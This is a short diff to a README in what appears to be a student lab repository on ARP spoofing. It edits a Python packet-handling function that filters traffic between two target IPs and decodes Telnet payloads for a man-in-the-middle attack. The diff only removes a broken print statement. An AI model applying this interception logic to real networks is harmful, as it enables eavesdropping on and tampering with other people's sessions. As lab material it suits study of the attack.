nigeldouglas-itcarlow/ARP-Spoofing-Attack/README.md

 # Define the Telnet data modification function
 def modify_telnet_data(pkt):
-    print("Nigel is launching an MitM Attack on Telnet") if IP in pkt and TCP in pkt and pkt[IP].src == target_a_ip and pkt[IP].dst == target_b_ip:
+    if IP in pkt and TCP in pkt and pkt[IP].src == target_a_ip and pkt[IP].dst == target_b_ip:
         # Extract the Telnet data from the TCP packet
         telnet_data = pkt[TCP].payload.load.decode(errors='ignore')